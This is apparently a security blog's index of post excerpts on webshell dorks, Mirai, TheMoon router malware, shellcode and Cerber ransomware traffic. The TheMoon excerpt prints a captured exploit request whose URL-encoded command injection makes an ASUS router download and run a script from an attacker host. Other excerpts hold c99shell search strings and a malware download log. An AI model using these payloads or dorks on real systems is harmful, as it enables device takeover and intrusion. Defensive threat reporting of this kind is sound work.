Every Google Dork Webshell C99shell Saudi Shell Huge List Of Searches

powered by captain crunch security team safe-mode: off (not secure) home basel 2.2 safe-mode: off (not secure) drwxrwxrwx c99memoryl c99shell [file on secure ok ] c99shell v. 1.0 pre-release build #16 hacker uid=99(nobody) gid=99(nobody) groups=99(nobody) –[ c99shell v. 1.0 pre-release build #16 basel c99shell v. 1.0 pre-release build powered by captain crunch security team | … Read more Every Google Dork Webshell C99shell Saudi Shell Huge List Of Searches



Mirai Internet of Things IoT DDoS sets record 600+ GB/Sec and your refrigerator could have been one of the attackers!

What is the Internet of Things (IoT) ? In today’s technological expansion everything seems to be connected to the Internet, for instance in my own home I have my refrigerator, thermostat, video cameras, tablets, cell phone, TV, xbox, DirecTV box, printer, security system, laptops, servers, workstations, Ethernet tap, a switch and a router all connected … Read more Mirai Internet of Things IoT DDoS sets record 600+ GB/Sec and your refrigerator could have been one of the attackers!



New Linux Backdoor found in the wild TheMoon family of malware ASUS Router NTTPD Vulnerability

New Linux Backdoor found in the wild on one of our honeypots – This bot belongs to the TheMoon family of malware The vulnerable ASUS router will  download and execute the binary file .nttpd from the attacker controlled website.   POST /hndUnblock.cgi HTTP/1.0 \r\nAccept: */*\r\n Host: 81.171.12.232\r\n User-Agent: Wget(linux)\r\n Content-Length: 414\r\n Content-Type: application/x-www-form-urlencoded submit_button=&change_action=&action=&commit=&ttcp_num=2&ttcp_size=2&ttcp_ip=-h `%63%64%20%2F%74%6D%70%3B%72%6D%20%2D%66%20%6E%6D%6C%74%31%2E%73%68%3B%77%67%65%74%20%2D%4F%20%6E%6D%6C%74%31%2E%73%68%20%68%74%74%70%3A%2F%2F%66%6C%6F%77%65%72%74%6F%77%65%72%73%62%6C%61%62%6C%61%2E%74%6F%70%2F%6E%6D%6C%74%31%2E%73%68%3B%63%68%6D%6F%64%20%2B%78%20%6E%6D%6C%74%31%2E%73%68%3B%2E%2F%6E%6D%6C%74%31%2E%73%68`&StartEPI=1′ https://virustotal.com/en/file/b963223d3f39884ebed3e647390e55d8de86c7e3c5daaae6509379a6fc3ba97e/analysis/1489518585/ … Read more New Linux Backdoor found in the wild TheMoon family of malware ASUS Router NTTPD Vulnerability



What is the IEEE? What Standards are Bluetooth, Wireless, Cable, Fiber

The IEEE is an acronym for the Institute of Electrical and Electronics Engineers. These are a bunch of scientists and students who together are a leading authority in the aerospace, telecommunications, biomedical engineering, electric power, etc. The IEEE consists of more than 365000 members from around the world. The IEEE was formed in 1963 by … Read more What is the IEEE? What Standards are Bluetooth, Wireless, Cable, Fiber



REINCARNA Linux.Wifatch Malware Whitehat Backdoor made by the good guys? How illegal is this?

So last night I did a little banner grabbing from some IP ranges that have been historically extremely insecure, I”m not a blackhat hacker anymore so my intentions weren’t to exploit these hopeless incompetent victims but I would have notified them. I have considered the idea of compromising them just to patch them and save … Read more REINCARNA Linux.Wifatch Malware Whitehat Backdoor made by the good guys? How illegal is this?



Writing Shellcode for Buffer Overflows – Avoiding Bad Characters

Depending on the application, vulnerability type, and protocols in use, there may be certain characters that are considered “bad” and should not be used in your buffer, return address, or shellcode. One example of a common bad character (especially in buffer overflows caused by unchecked string copy operations) is the null byte (0x00). This character is considered bad because … Read more Writing Shellcode for Buffer Overflows – Avoiding Bad Characters



Similarities and Differences in the terms Phishing, Malvertising, Spam and Malware E-mails

What is Phishing? What are malvertising, spam e-mail and malware e-mail campaigns?  These terms have started to become intertwined and used interchangeably which generally means that there is a lack of understanding in the IT community which is typical. Over time laziness and improper training has a way of bending security definitions into bundles. A great example … Read more Similarities and Differences in the terms Phishing, Malvertising, Spam and Malware E-mails



Malspam E-mail Leads to Ransomware Cerber/Zerber Infection TRAFFIC SAMPLE

Malspam E-mail Leads to Ransomware Cerber/Zerber Infection TRAFFIC SAMPLE Example of files that were encrypted and protected:   The domain name ftoxmpdipwobp4qy.joa688.top was NX and not required for the purchase process. 2016-12-16 01:29:05.256362 IP 192.168.1.102.50104 > 72.167.232.152.80: Flags [P.], seq 0:303, ack 1, win 256, length 303: HTTP: GET //up1/1/4fv3b5.exe HTTP/1.1 E..W..@……..fH……P.n……P…….GET //up1/1/4fv3b5.exe HTTP/1.1 Accept: application/x-shockwave-flash, … Read more Malspam E-mail Leads to Ransomware Cerber/Zerber Infection TRAFFIC SAMPLE





NordVPN 1-Year Subscription

NordVPN 1-Year Subscription

Keep your online activity hidden with the best VPN service. NordVPN keeps no logs and encrypts your traffic so your data stays safe and private.